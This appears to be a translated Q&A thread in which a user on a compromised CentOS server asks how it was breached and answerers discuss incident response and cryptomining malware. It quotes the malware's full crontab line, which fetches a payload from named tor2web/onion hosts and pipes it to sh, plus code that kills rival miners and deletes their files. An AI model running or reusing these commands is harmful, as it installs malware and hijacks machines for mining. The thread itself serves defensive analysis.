我正在一台受感染的服务器上工作。CentOS 6.10 的 [kthreadd] 占用了大部分 CPU。
删除旧的 crontab,并替换以下内容:
*/4 * * * * R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &
我还在文件结构中发现了以下 shell 脚本: 粘贴箱
因此,根据我在系统中发现的所有问题,我猜每个人都会告诉我创建一个新服务器。我肯定会这么做。但也许有人愿意深入研究脚本。我真的很想知道系统是如何被攻破的
答案1
脚本本身无法帮助找出攻击媒介。您可以通过识别脚本位置和运行脚本的用户来获得大致的了解。如果是 root 用户,这也无济于事。
所以,这里重要的部分是,从现在开始,无论您做什么,您的服务器都将受到威胁。
我假设您已经删除了恶意的 cron 任务?很有可能存在一些后门或残留进程,它们会自行重生和/或重新创建 cron。
如果您愿意让服务器运行,您可以设置带有文件修改规则的审计实用程序,以查看哪些进程更改了哪些内容。然后沿着链条向上查找合法的受感染进程。
答案2
首先,你是如何被入侵的,这是找出根本原因的正确问题。但这不是通过查看脚本就能回答的问题。脚本是有效载荷。它是通过某种方式安装的,例如坏人手中的凭证或漏洞利用链。
此外,仅仅知道这个主机是如何被攻破的并不能解决你的环境中的任何其他漏洞。
考虑聘请安全顾问进行渗透测试或红队演习。外部人员可能更能发现漏洞。
显然是域名an7kmd2wp4xo7hpr.tor2web.su 声誉不佳作为恶意软件站点。
乍一看,他们所做的事情似乎相对简单:加密挖掘。
elif [ -f /proc/${p}/comm ]; then
xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"
xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2>/dev/null)
fi
if [ -n "${xm}" ]; then ${sudo} kill -9 ${p} >/dev/null 2>&1; ${sudo} chattr -i -a "${xmf}" >/dev/null 2>&1; ${sudo} ${rm} -rf "${xmf}" >/dev/null 2>&1; fi
杀死竞争矿工并在重启后幸存下来,对攻击者来说更有利可图。这不是第一个这样做的人,这是几个月来在 Linux 机器上出现的一种模式如果不是更长的话。